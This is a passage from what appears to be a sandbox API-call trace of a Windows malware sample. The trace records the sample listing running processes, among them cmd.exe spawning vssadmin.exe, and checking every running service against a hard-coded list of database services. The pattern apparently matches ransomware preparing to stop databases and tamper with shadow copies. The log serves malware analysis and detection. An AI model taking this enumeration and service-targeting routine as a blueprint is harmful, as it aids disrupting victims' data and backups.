th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0039.694] lstrlenW (lpString="pattern amateur.exe") returned 19 [0039.695] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0039.695] lstrlenW (lpString="referral.exe") returned 12 [0039.695] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0039.696] lstrlenW (lpString="copyingseems.exe") returned 16 [0039.696] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0039.696] lstrlenW (lpString="spin generally.exe") returned 18 [0039.696] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0039.697] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0039.697] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0039.698] lstrlenW (lpString="transmit.exe") returned 12 [0039.698] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0039.698] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0039.698] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0039.699] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0039.699] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0039.700] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0039.700] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0039.749] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0039.749] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0039.750] lstrlenW (lpString="delight.exe") returned 11 [0039.750] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0039.751] lstrlenW (lpString="within enquiry.exe") returned 18 [0039.751] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0039.751] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0039.751] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0039.752] lstrlenW (lpString="agent1c.exe") returned 11 [0039.752] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0039.752] lstrlenW (lpString="cmd.exe") returned 7 [0039.753] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0039.753] lstrlenW (lpString="conhost.exe") returned 11 [0039.753] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0039.754] lstrlenW (lpString="vssadmin.exe") returned 12 [0039.754] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0039.754] lstrlenW (lpString="VSSVC.exe") returned 9 [0039.755] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0039.755] CloseHandle (hObject=0x170) returned 1 [0039.755] Sleep (dwMilliseconds=0x1f4) [0040.415] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720970 [0040.415] EnumServicesStatusExW (in: hSCManager=0x3720970, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0040.415] GetLastError () returned 0xea [0040.415] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x3800fb0 [0040.416] EnumServicesStatusExW (in: hSCManager=0x3720970, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0040.416] CloseServiceHandle (hSCObject=0x3720970) returned 1 [0040.417] lstrlenW (lpString="Appinfo") returned 7 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0040.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0040.417] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0040.417] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0040.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0040.417] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.417] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0040.417] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0040.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0040.417] lstrlenW (lpString="AudioSrv") returned 8 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0040.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0040.417] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0040.417] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0040.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0040.417] lstrlenW (lpString="BFE") returned 3 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0040.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0040.417] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0040.417] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0040.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0040.417] lstrlenW (lpString="CryptSvc") returned 8 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0040.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0040.417] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0040.417] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0040.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0040.417] lstrlenW (lpString="CscService") returned 10 [0040.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0040.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0040.418] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0040.418] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0040.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0040.418] lstrlenW (lpString="DcomLaunch") returned 10 [0040.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.418] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0040.418] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0040.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0040.418] lstrlenW (lpString="Dhcp") returned 4 [0040.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0040.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0040.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0040.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0040.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0040.418] lstrlenW (lpString="Dnscache") returned 8 [0040.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0040.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0040.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0040.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0040.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0040.418] lstrlenW (lpString="DPS") returned 3 [0040.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0040.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0040.418] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0040.418] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0040.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0040.419] lstrlenW (lpString="eventlog") returned 8 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0040.419] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0040.419] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0040.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0040.419] lstrlenW (lpString="EventSystem") returned 11 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0040.419] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0040.419] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0040.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0040.419] lstrlenW (lpString="gpsvc") returned 5 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0040.419] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0040.419] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0040.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0040.419] lstrlenW (lpString="iphlpsvc") returned 8 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.419] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0040.419] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0040.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0040.419] lstrlenW (lpString="LanmanServer") returned 12 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0040.419] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0040.419] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0040.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0040.419] lstrlenW (lpString="LanmanWorkstation") returned 17 [0040.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0040.420] lstrlenW (lpString="lmhosts") returned 7 [0040.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0040.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0040.420] lstrlenW (lpString="MMCSS") returned 5 [0040.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0040.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0040.420] lstrlenW (lpString="MpsSvc") returned 6 [0040.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0040.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0040.420] lstrlenW (lpString="Netman") returned 6 [0040.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0040.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0040.420] lstrlenW (lpString="netprofm") returned 8 [0040.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0040.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0040.420] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0040.420] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0040.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0040.420] lstrlenW (lpString="NlaSvc") returned 6 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0040.421] lstrlenW (lpString="nsi") returned 3 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0040.421] lstrlenW (lpString="PcaSvc") returned 6 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0040.421] lstrlenW (lpString="PlugPlay") returned 8 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0040.421] lstrlenW (lpString="Power") returned 5 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0040.421] lstrlenW (lpString="ProfSvc") returned 7 [0040.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0040.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0040.421] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0040.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0040.421] lstrlenW (lpString="RpcEptMapper") returned 12 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0040.422] lstrlenW (lpString="RpcSs") returned 5 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0040.422] lstrlenW (lpString="SamSs") returned 5 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0040.422] lstrlenW (lpString="Schedule") returned 8 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0040.422] lstrlenW (lpString="SENS") returned 4 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0040.422] lstrlenW (lpString="ShellHWDetection") returned 16 [0040.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.422] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0040.422] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0040.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0040.423] lstrlenW (lpString="Spooler") returned 7 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0040.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0040.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0040.423] lstrlenW (lpString="SysMain") returned 7 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0040.423] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0040.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0040.423] lstrlenW (lpString="Themes") returned 6 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0040.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0040.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0040.423] lstrlenW (lpString="TrkWks") returned 6 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0040.423] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0040.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0040.423] lstrlenW (lpString="UxSms") returned 5 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0040.423] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0040.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0040.423] lstrlenW (lpString="VSS") returned 3 [0040.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0040.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0040.423] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0040.424] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0040.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0040.424] lstrlenW (lpString="WdiServiceHost") returned 14 [0040.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.424] 